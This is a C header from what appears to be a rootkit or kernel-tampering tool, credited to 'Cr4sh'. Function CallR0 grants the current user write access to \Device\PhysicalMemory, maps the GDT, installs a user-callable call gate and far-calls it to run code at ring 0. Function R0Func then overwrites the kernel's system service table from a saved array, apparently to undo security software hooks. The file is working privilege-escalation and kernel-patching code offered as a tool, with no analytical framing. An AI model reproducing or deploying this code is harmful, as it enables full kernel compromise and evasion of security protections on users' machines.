src/r0.h

1. // (c) Cr4sh
2.  
3. #define INTNUMBER               0FFh
4. #define SE_KERNEL_OBJECT        6
5. #define OBJ_KERNEL_HANDLE       0x00000200L
6.  
7. #define INIT_UNICODE(_var,_buffer)            \
8.         UNICODE_STRING _var = {               \
9.             sizeof (_buffer) - sizeof (WORD), \
10.             sizeof (_buffer),                 \
11.             _buffer }
12.  
13. #define MAKE_DWORD(_l, _h) (DWORD) (_l | (_h << 16))
14.  
15. typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
16.  
17. typedef struct _KGDTENTRY
18. {
19.    WORD LimitLow;
20.    WORD BaseLow;
21.    WORD BaseHigh;
22. } KGDTENTRY,
23. *PKGDTENTRY;
24.  
25. typedef struct _CALLGATE_DESCRIPTOR
26. {
27.    USHORT offset_0_15;
28.    USHORT selector;
29.    UCHAR  param_count :4;
30.    UCHAR  some_bits   :4;
31.    UCHAR  type        :4;
32.    UCHAR  app_system  :1;
33.    UCHAR  dpl         :2;
34.    UCHAR  present     :1;
35.    USHORT offset_16_31;
36. } CALLGATE_DESCRIPTOR,
37. *PCALLGATE_DESCRIPTOR;
38.  
39.  
40.  
41. extern DWORD sstaddr;
42. extern DWORD dwServices;
43. DWORD sst[400];
44. //--------------------------------------------------------------------------------------
45. void __declspec(naked) R0Func(void)
46. {
47.     UINT i;
48.     __asm
49.     {
50.         cli
51.         pushad
52.         pushf
53.         mov     di,0x30
54.         mov     fs,di
55.     }
56.  
57.     for (i = 0; i < dwServices; i++)
58.         ((DWORD*)(*(DWORD*)(sstaddr)))[i] = sst[i];
59.  
60.     __asm
61.     {
62.         mov     di,0x3B
63.         mov     fs,di
64.         popf
65.         popad
66.         sti
67.         retf
68.     }
69. }
70. //--------------------------------------------------------------------------------------
71. /*
72. DWORD FindFunc(char *name)
73. {
74.     HMODULE hKrnl = LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
75.     if (hKrnl == NULL)
76.         return 0;
77.  
78.     DWORD dwAddr = (DWORD)GetProcAddress(hKrnl, name);
79.     if (dwAddr == 0)
80.         return 0;
81.  
82.     return dwAddr - (DWORD)hKrnl + dwKernelBase;
83. }
84. */
85. //--------------------------------------------------------------------------------------
86. PHYSICAL_ADDRESS GetPhysicalAddress(ULONG vAddress)
87. {
88.     PHYSICAL_ADDRESS  addr;
89.  
90.     if (vAddress < 0x80000000L || vAddress >= 0xA0000000L)
91.     {
92.         addr.QuadPart = (ULONGLONG) vAddress & 0xFFFF000;
93.     } else {
94.         addr.QuadPart = (ULONGLONG) vAddress & 0x1FFFF000;
95.     }
96.    
97.     return addr;
98. }
99. //--------------------------------------------------------------------------------------
100. void SetAccess(POBJECT_ATTRIBUTES ObAttributes)
101. {
102.     EXPLICIT_ACCESS Access;
103.     HANDLE hObj;
104.     PACL OldDacl = NULL, NewDacl = NULL;
105.     PSECURITY_DESCRIPTOR SecDesc = NULL;
106.     NTSTATUS ns;
107.    
108.     Access.grfAccessPermissions             = SECTION_MAP_WRITE;
109.     Access.grfAccessMode                    = GRANT_ACCESS;
110.     Access.grfInheritance                   = NO_INHERITANCE;
111.     Access.Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
112.     Access.Trustee.pMultipleTrustee         = NULL;
113.     Access.Trustee.TrusteeForm              = TRUSTEE_IS_NAME;
114.     Access.Trustee.TrusteeType              = TRUSTEE_IS_USER;
115.     Access.Trustee.ptstrName                = "CURRENT_USER";
116.  
117.     ns = NtOpenSection(&hObj, MEM_MAPPED | MEM_PRIVATE, ObAttributes);
118.    
119.     ns = GetSecurityInfo(hObj, (SE_OBJECT_TYPE)SE_KERNEL_OBJECT,
120.         DACL_SECURITY_INFORMATION, 0, 0, &OldDacl, 0, &SecDesc);
121.    
122.     ns = SetEntriesInAcl(1, &Access, OldDacl, &NewDacl);
123.    
124.     ns = SetSecurityInfo(hObj, (SE_OBJECT_TYPE)SE_KERNEL_OBJECT,
125.         DACL_SECURITY_INFORMATION, NULL, NULL, NewDacl, NULL);
126.  
127.     CloseHandle(hObj);
128. }
129. //--------------------------------------------------------------------------------------
130. KGDTENTRY gGdt;
131. BOOL CallR0(DWORD Func)
132. {
133.     BOOL bRes = FALSE;
134.     OBJECT_ATTRIBUTES ObAttributes;
135.     HANDLE hSection;
136.     NTSTATUS ns;
137.     PHYSICAL_ADDRESS pAddress;
138.     PVOID MappedAddress = NULL;
139.     DWORD dwSize;
140.     PCALLGATE_DESCRIPTOR CgDesc;
141.     WORD farcall[3];
142.     INIT_UNICODE(ObString, L"\\Device\\PhysicalMemory");
143.     InitializeObjectAttributes(&ObAttributes, &ObString, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
144.    
145.     SetAccess(&ObAttributes);
146.  
147.     ns = NtOpenSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE, &ObAttributes);
148.     if (!NT_SUCCESS(ns))
149.     {
150.     //  printf("[!] NtOpenSection ERROR: %x\n", ns);
151.         return FALSE;
152.     }
153.  
154.  
155.     __asm sgdt gGdt;
156. ///
157. //  printf("virtual address of GDT : 0x%.8x\n", MAKE_DWORD(gGdt.BaseLow, gGdt.BaseHigh));
158.    
159.     pAddress = GetPhysicalAddress(MAKE_DWORD(gGdt.BaseLow, gGdt.BaseHigh));
160.    
161. //  printf("physical address of GDT: 0x%.16x\n", pAddress.QuadPart);
162.  
163.     dwSize = gGdt.LimitLow;
164.     ns = NtMapViewOfSection(hSection, (HANDLE)-1, &MappedAddress,
165.                             0L, dwSize, &pAddress, &dwSize, ViewShare,
166.                             0, PAGE_READWRITE);
167.     if (!NT_SUCCESS(ns) || !MappedAddress)
168.     {
169.     //  printf("[!] NtMapViewOfSection ERROR: %x\n", ns);
170.         goto end;
171.     }
172.  
173.     for (CgDesc = (PCALLGATE_DESCRIPTOR)((DWORD)MappedAddress + (gGdt.LimitLow & 0xFFF8));
174.         (DWORD)CgDesc > (DWORD)MappedAddress;
175.         CgDesc--)
176.     {      
177.         //printf("present:%x, type:%x\n", CgDesc->present, CgDesc->type);
178.  
179.         if (CgDesc->present == 0)
180.         {      
181.             CgDesc->offset_0_15  = (WORD)(Func & 0xFFFF);
182.             CgDesc->selector     = 8;
183.             CgDesc->param_count  = 0;
184.             CgDesc->some_bits    = 0;
185.             CgDesc->type         = 12;
186.             CgDesc->app_system   = 0;
187.             CgDesc->dpl          = 3;
188.             CgDesc->present      = 1;
189.             CgDesc->offset_16_31 = (WORD)(Func >> 16);         
190.             bRes = TRUE;
191.             break;
192.         }
193.     }
194.  
195.     if (bRes)
196.     {
197.  
198.         farcall[2] = ((WORD)((DWORD)CgDesc - (DWORD)MappedAddress))|3;
199.         SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
200.         Sleep(0);
201.  
202.         __try
203.         {
204.             __asm call fword ptr [farcall]
205.         }
206.         __except (EXCEPTION_EXECUTE_HANDLER)
207.         {
208.             // printf("EXEPTION\n");
209.             bRes = FALSE;
210.         }
211.  
212.         SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);
213.  
214.         fZeroMemory(CgDesc, sizeof(CALLGATE_DESCRIPTOR));
215.     }
216.  
217. end:
218.     NtUnmapViewOfSection((HANDLE)-1, MappedAddress);
219.  
220.     CloseHandle(hSection);
221.  
222.     return bRes;
223. }
224. //--------------------------------------------------------------------------------------
225. //int _tmain(int argc, _TCHAR* argv[])
226. //{
227.     // printf("end\n");
228. //}
229.